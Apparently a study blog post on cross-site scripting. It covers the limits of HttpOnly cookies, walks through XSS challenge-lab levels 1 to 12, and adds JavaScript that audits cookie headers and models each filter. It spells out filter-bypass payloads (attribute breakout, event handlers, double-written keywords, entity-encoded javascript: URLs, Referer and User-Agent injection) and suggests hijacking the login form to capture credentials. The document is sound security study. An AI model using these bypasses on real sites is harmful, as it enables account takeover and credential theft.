HttpOnly: if a cookie is set with the HttpOnly attribute, script cannot read it (it does not appear in document.cookie), although the cookie can still be edited by hand in the browser. HttpOnly therefore only blocks one consequence of XSS, cookie theft; it is not absolute protection.
After HttpOnly is set the injected script cannot read the cookie, but the XSS cross-site vulnerability itself is still there; only the cookie grab is blocked.
So instead of the cookie, take the username and password directly and log in with those. If the browser has not saved the password, the XSS has to be on the login page itself, hijacking the login form; if the browser has saved the account (autofill), a stored XSS running in the background, for example a stored XSS on an internal page, can pick the values up.
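The point above can be checked against real responses. The following is an added example, not code from the original notes: it parses Set-Cookie headers, reports which cookies an injected script could read via document.cookie and which other attributes are missing, and models what the script would see. The header lines are constructed sample data.

```javascript
// Added example (not from the original notes): audit Set-Cookie headers for
// HttpOnly and related attributes, and model what document.cookie would
// expose to an injected script. The headers below are constructed samples.

// Parse one Set-Cookie header value into { name, value, attrs }.
// Attribute names are lower-cased; valueless attributes map to true.
function parseSetCookie(header) {
  const parts = header.split(";").map((p) => p.trim());
  const [name, ...rest] = parts[0].split("=");
  const attrs = {};
  for (const p of parts.slice(1)) {
    const idx = p.indexOf("=");
    const key = (idx === -1 ? p : p.slice(0, idx)).trim().toLowerCase();
    attrs[key] = idx === -1 ? true : p.slice(idx + 1).trim();
  }
  return { name: name.trim(), value: rest.join("="), attrs };
}

// One finding per cookie: which protective attributes are absent.
function auditSetCookie(headers) {
  return headers.map((h) => {
    const c = parseSetCookie(h);
    const problems = [];
    if (!c.attrs.httponly) problems.push("missing HttpOnly: readable via document.cookie");
    if (!c.attrs.secure) problems.push("missing Secure: sent over plain HTTP");
    if (!c.attrs.samesite) problems.push("missing SameSite: attached to cross-site requests");
    return { name: c.name, problems };
  });
}

// What document.cookie would return to a script on the page:
// only cookies set without HttpOnly are visible.
function scriptVisibleCookies(headers) {
  return headers
    .map(parseSetCookie)
    .filter((c) => !c.attrs.httponly)
    .map((c) => `${c.name}=${c.value}`)
    .join("; ");
}

// Constructed sample headers: a hardened session cookie, a remember-me token
// with no attributes, and a harmless preference cookie.
const SAMPLE_HEADERS = [
  "PHPSESSID=abc123; Path=/; HttpOnly; Secure; SameSite=Lax",
  "remember_me=tok987; Path=/; Expires=Wed, 01 Jan 2025 00:00:00 GMT",
  "theme=dark; Path=/",
];

for (const f of auditSetCookie(SAMPLE_HEADERS)) {
  console.log(f.name, f.problems.length ? f.problems : "ok");
}
console.log("document.cookie would show:", scriptVisibleCookies(SAMPLE_HEADERS));
```

Note what the audit does not cover: with PHPSESSID marked HttpOnly the script sees only remember_me and theme, but it can still add a submit handler to the login form and post the typed credentials elsewhere, which is exactly the fallback the notes describe.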
Working through the XSS cross-site challenge levels by hand:
Level 1:
Level 2:
The input is escaped; view the source.
There is an htmlspecialchars() function:
It converts special characters (& < > ") into HTML entities and is the most common XSS filter.
Level 2 (continued):
Close the preceding double quote of the value attribute: "><script>alert(1)</script>
Level 3:
Here < and > are escaped as well, but the single quote is not, so use an event attribute on the form input instead of a tag: ' onclick='alert(1)
Level 4:
Level 5:
Level 6:
Continuing with the code from level 5, href turns out to be filtered too; view the source.
Level 7:
Same as in upload-labs: the replacement in the code is done in a single pass, not in a loop, so writing the keyword inside itself (double writing) gets around it.
Level 8:
Neither changing the case nor double writing works; replace characters with their Unicode (HTML numeric entity) codes instead.
Level 9:
This level is nearly impossible without reading the code: the code checks that http:// is present in the input.
Level 10:
View the source: the input attribute is hidden (a hidden form field).
Level 11:
HTTP Referer header, source checking. The server checks where a request comes from to decide whether it is a CSRF cross-site request: with the administrator logged in, a request carrying the "add administrator" parameters gets executed and an administrator is added. Checking the Referer is the server-side counterpart of the browser's same-origin policy: if the request does not come from the site's own domain it is rejected; a per-request token solves the problem more reliably. In this level the input goes in through the Referer header: &t_sort=" type="text" onclick="alert(1)"
Level 12:
The User-Agent header is tested; the aizhan site had a cross-site issue of this kind as well. The following levels are all variants of hidden attributes and request headers, essentially the same, so no more notes are recorded.
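To make the bypasses above concrete, here is an added example that is not the lab's own source: simplified JavaScript models of the server-side filters described in levels 2, 3, 7, 8, 9 and 10, with each level's payload run through them. The filter behaviour is reconstructed from the notes (htmlspecialchars escaping, single-pass keyword removal, case-insensitive mangling, the http:// check, a hidden input), so the real lab code may differ in detail; the function names and the rendered HTML are this example's assumptions.

```javascript
// Added example, not the lab's own code: reconstructed models of the filters
// met in the levels above, so each bypass can be checked offline.

// PHP htmlspecialchars() with default flags: & < > " become entities, ' does not.
function htmlspecialchars(s) {
  return s.replace(/&/g, "&amp;").replace(/</g, "&lt;")
          .replace(/>/g, "&gt;").replace(/"/g, "&quot;");
}

// Level 2 (assumed sink): the echoed text is escaped, but the value attribute
// is inserted raw, so closing the double quote breaks out of the attribute.
function renderLevel2(input) {
  return `<h2>${htmlspecialchars(input)}</h2>` +
         `<input name="keyword" value="${input}">`;
}

// Level 3 (assumed sink): the attribute is escaped too, but it is single-quoted
// and htmlspecialchars leaves ' alone, so an event attribute can be appended.
function renderLevel3(input) {
  return `<input name="keyword" value='${htmlspecialchars(input)}'>`;
}

// Level 7: keywords are stripped in a single pass, not in a loop, so a keyword
// written inside itself leaves one intact copy after the pass.
function filterLevel7(input) {
  return input.toLowerCase()
    .replace(/script/g, "").replace(/on/g, "").replace(/href/g, "");
}

// Level 8: case-insensitive keyword mangling. The filter never sees a keyword
// once one of its letters is written as an HTML numeric entity.
function filterLevel8(input) {
  return input.toLowerCase()
    .replace(/script/g, "scr_ipt").replace(/on/g, "o_n")
    .replace(/href/g, "hr_ef").replace(/"/g, "&quot;");
}

// What the browser does with an attribute value before treating it as a URL:
// decode numeric character references such as &#105; or &#x69;.
function decodeNumericEntities(s) {
  return s.replace(/&#x([0-9a-f]+);/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
          .replace(/&#(\d+);/g, (_, d) => String.fromCodePoint(parseInt(d, 10)));
}

// Level 9: the level 8 mangling plus a check that "http://" occurs somewhere.
// Returns null when the input is rejected. A javascript: URL still passes if
// http:// sits after a // comment, where the script engine ignores it.
function filterLevel9(input) {
  if (!input.includes("http://")) return null;
  return filterLevel8(input);
}

// Levels 10 to 12 (assumed sink): a hidden input whose value comes from a query
// parameter, or in the later levels from the Referer / User-Agent header.
function renderHiddenInput(value) {
  return `<input name="t_sort" value="${value}" type="hidden">`;
}

// Browsers keep the first occurrence of a duplicated attribute, so an injected
// type="text" placed before the original type="hidden" makes the field visible.
function firstTypeAttribute(html) {
  const m = html.match(/\stype="([^"]*)"/);
  return m ? m[1] : null;
}

console.log(renderLevel2('"><script>alert(1)</script>'));
console.log(renderLevel3("' onclick='alert(1)"));
console.log(filterLevel7('"><scrscriptipt>alert(1)</scrscriptipt>'));
console.log(decodeNumericEntities(filterLevel8("javascr&#105;pt:alert(1)")));
console.log(decodeNumericEntities(filterLevel9("javascr&#105;pt:alert(1)//http://")));
console.log(renderHiddenInput('" type="text" onclick="alert(1)'));
```

The level 8 and 9 cases show why entity encoding works against keyword filters: the filter compares raw bytes, while the browser decodes the attribute value first and only then parses the URL scheme.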